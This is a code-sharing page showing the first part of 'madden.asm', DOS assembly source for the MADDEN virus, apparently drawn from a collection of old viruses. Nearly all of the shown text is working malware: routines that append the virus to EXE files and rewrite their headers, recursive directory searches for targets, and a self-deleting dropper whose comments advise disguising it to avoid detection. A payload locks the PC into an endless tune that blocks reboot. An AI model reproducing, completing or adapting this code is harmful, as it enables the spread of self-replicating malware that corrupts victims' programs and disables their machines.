madden.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 806 行 · 第 1/3 页
ASM
806 行
;The MADDEN virus is an EXE file infector which can jump from directory to
;directory. It attaches itself to the end of a file and
;modifies the EXE file header so that it gets control first, before the host
;program. When it is done doing its job, it passes control to the host program,
;so that the host executes without a hint that the virus is there.
.SEQ ;segments must appear in sequential order
;to simulate conditions in actual active virus
;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together
;HOSTSEG program code segment. The virus gains control before this routine and
;attaches itself to another EXE file. As such, the host program for this
;installer simply tries to delete itself off of disk and terminates. That is
;worthwhile if you want to infect a system with the virus without getting
;caught. Just execute the program that infects, and it disappears without a
;trace. You might want to name the program something more innocuous, though.
;MADDEN also locks the pc into a 'maddening' toon when it runs out
;of files to infect. (MADDEN can be assembled to an .obj file under a86,
;then linked to the 'infected' .exe form.)
HOSTSEG SEGMENT BYTE
ASSUME CS:HOSTSEG,SS:HSTACK
PGMSTR DB 'MADDEN.EXE',0
HOST:
mov ax,cs ;we want DS=CS here
mov ds,ax
mov dx,OFFSET PGMSTR
mov ah,41H
int 21H ;delete this exe file
mov ah,4CH
mov al,0
int 21H ;terminate normally
HOSTSEG ENDS
;Host program stack segment
HSTACK SEGMENT PARA STACK
db 100H dup (?) ;100 bytes long
HSTACK ENDS
;------------------------------------------------------------------------
;This is the virus itself
STACKSIZE EQU 100H ;size of stack for the virus
NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table
;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together
;MADDEN Virus code segment. This gains control first, before the host. As this
;ASM file is layed out, this program will look exactly like a simple program
;that was infected by the virus.
VSEG SEGMENT PARA
ASSUME CS:VSEG,DS:VSEG,SS:VSTACK
;data storage area comes before any code
VIRUSID DW 0C8AAH ;identifies virus
OLDDTA DD 0 ;old DTA segment and offset
DTA1 DB 2BH dup (?) ;new disk transfer area
DTA2 DB 56H dup (?) ;dta for directory finds (2 deep)
EXE_HDR DB 1CH dup (?) ;buffer for EXE file header
EXEFILE DB '\*.EXE',0 ;search string for an exe file
ALLFILE DB '\*.*',0 ;search string for any file
USEFILE DB 78 dup (?) ;area to put valid file path
LEVEL DB 0 ;depth to search directories for a file
HANDLE DW 0 ;file handle
FATTR DB 0 ;old file attribute storage area
FTIME DW 0 ;old file time stamp storage area
FDATE DW 0 ;old file date stamp storage area
FSIZE DD 0 ;file size storage area
VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there
VCODE DB 1 ;identifies this version
MUZIK dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 5119,0006, 5423,0006, 3043,0006,
dw 6087,0020,
dw 6087,0006,
dw 7239,0006, 3619,0006, 4831,0006, 6087,0006
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 6087,0006, 4063,0006, 3043,0006, 5119,0006
dw 4831,0006, 6087,0006, 7239,0006, 8126,0006
dw 6087,0020,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 5119,0006, 5423,0006, 3043,0006,
dw 6087,0020,
dw 6087,0006,
dw 7239,0006, 3619,0006, 4831,0006, 6087,0006
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 6087,0006, 4063,0006, 3043,0006, 5119,0006
dw 4831,0006, 6087,0006, 7239,0006, 8126,0006
dw 6087,0020,
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 3043,0006, 3619,0006, 4831,0006, 6087,0006
dw 3043,0010,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 5119,0006, 5423,0006, 3043,0006,
dw 6087,0020,
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 3043,0006, 3619,0006, 4831,0006, 6087,0006
dw 3043,0010,
dw 6087,0006,
dw 7239,0006, 3619,0006, 4831,0006, 6087,0006
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 6087,0006, 4063,0006, 3043,0006, 5119,0006
dw 4831,0006, 6087,0006, 7239,0006, 8126,0006
dw 6087,0020,
dw 0ffffh
;--------------------------------------------------------------------------
;MADDEN virus main routine starts here
VIRUS:
push ax ;save startup info in ax
mov ax,cs
mov ds,ax ;set up DS=CS for the virus
mov ax,es ;get PSP Seg
mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it
call SHOULDRUN ;run only when certain conditions met signalled by z set
jnz REL1 ;conditions aren't met, go execute host program
call SETSR ;modify SHOULDRUN procedure to activate conditions
call NEW_DTA ;set up a new DTA location
call FIND_FILE ;get an exe file to attack
jnz TOON ;returned nz - no valid files left, play maddening toon!
call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode
call INFECT ;move program code to file we found to attack
call REST_ATTRIBUTE ;restore the original file attributes and close the file
FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup
pop ax ;restore startup value of ax
REL1: ;relocatable marker for host stack segment
mov bx,HSTACK ;set up host program stack segment (ax=segment)
cli ;interrupts off while changing stack
mov ss,bx
REL1A: ;marker for host stack pointer
mov sp,OFFSET HSTACK
mov es,WORD PTR [OLDDTA+2] ;set up ES correctly
mov ds,WORD PTR [OLDDTA+2] ;and DS
sti ;interrupts back on
REL2: ;relocatable marker for host code segment
jmp FAR PTR HOST ;begin execution of host program
;--------------------------------------------------------------------------
;First Level - Find a file which passes FILE_OK
;
;This routine does a complex directory search to find an EXE file in the
;current directory, one of its subdirectories, or the root directory or one
;of its subdirectories, to find a file for which FILE_OK returns with C reset.
;If you want to change the depth of the search, make sure to allocate enough
;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work,
;since the recursive FINDBR uses a different DTA area for the search (see DOS
;functions 4EH and 4FH) on each level.
;
FIND_FILE:
mov al,'\' ;set up current directory path in USEFILE
mov BYTE PTR [USEFILE],al
mov si,OFFSET USEFILE+1
xor dl,dl
mov ah,47H
int 21H ;get current dir, USEFILE= \dir
cmp BYTE PTR [USEFILE+1],0 ;see if it is null. If so, its the root
jnz FF2 ;not the root
xor al,al ;make correction for root directory,
mov BYTE PTR [USEFILE],al ;by setting USEFILE = ''
FF2: mov al,2
mov [LEVEL],al ;search 2 subdirs deep
call FINDBR ;attempt to locate a valid file
jz FF3 ;found one - exit
xor al,al ;nope - try the root directory
mov BYTE PTR [USEFILE],al ;by setting USEFILE= ''
inc al ;al=1
mov [LEVEL],al ;search one subdir deep
call FINDBR ;attempt to find file
FF3:
ret ;exit with z flag set by FINDBR to indicate success/failure
;***************************************************************************
; This routine enables MADDEN virus to compell the pc to play a
;'maddening' toon when it can't find a file to infect
;**************************************************************************
TOON:
cli ;interrupts off
mov al,10110110xb ;the magic number
out 43h,al ;send it
lea si,MUZIK ;point (si) to our note table
TOON2: cld ;must increment forward
lodsw ;load word into ax and increment (si)
cmp ax,0ffffh ;is it ffff - if so end of table
jz GO_MUZIK2 ;so, time to jump into endless loop
out 42h,al ;send LSB first
mov al,ah ;place MSB in al
out 42h,al ;send it next
in al,61h ;get value to turn on speaker
or al,00000011xb ;OR the gotten value
out 61h,al ;now we turn on speaker
lodsw ;load the repeat loop count into (ax)
LOOP6: mov cx,8000 ;delay count
LOOP7: loop LOOP7 ;do the delay
dec ax ;decrement repeat count
jnz loop6 ;if not = 0 loop back
in al,61h ;all done
and al,11111100xb ;number turns speaker off
out 61h,al ;send it
jmp short TOON2 ;now go do next note
GO_MUZIK2: ;our loop point
sti ;enable interrupts
jmp TOON ;jump back to beginning - this code
; has the additional advantage of
;locking out CTRL-ALT-DEL reboot.
;The user must do a hard reset to recover.
;--------------------------------------------------------------------------
;SEARCH FUNCTION
;---------------------------------------------------------------------------
;Second Level - Find in a branch
;
;This function searches the directory specified in USEFILE for EXE files.
;after searching the specified directory, it searches subdirectories to the
;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this
;routine exits with Z set and leaves the file and path in USEFILE
;
FINDBR:
call FINDEXE ;search current dir for EXE first
jnc FBE3 ;found it - exit
cmp [LEVEL],0 ;no - do we want to go another directory deeper?
jz FBE1 ;no - exit
dec [LEVEL] ;yes - decrement LEVEL and continue
mov di,OFFSET USEFILE ;'\curr_dir' is here
mov si,OFFSET ALLFILE ;'\*.*' is here
call CONCAT ;get '\curr_dir\*.*' in USEFILE
inc di
push di ;store pointer to first *
call FIRSTDIR ;get first subdirectory
jnz FBE ;couldn't find it, so quit
FB1: ;otherwise, check it out
pop di ;strip \*.* off of USEFILE
xor al,al
stosb
mov di,OFFSET USEFILE
mov bx,OFFSET DTA2+1EH
mov al,[LEVEL]
mov dl,2BH ;compute correct DTA location for subdir name
mul dl ;which depends on the depth we're at in the search
add bx,ax ;bx points to directory name
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?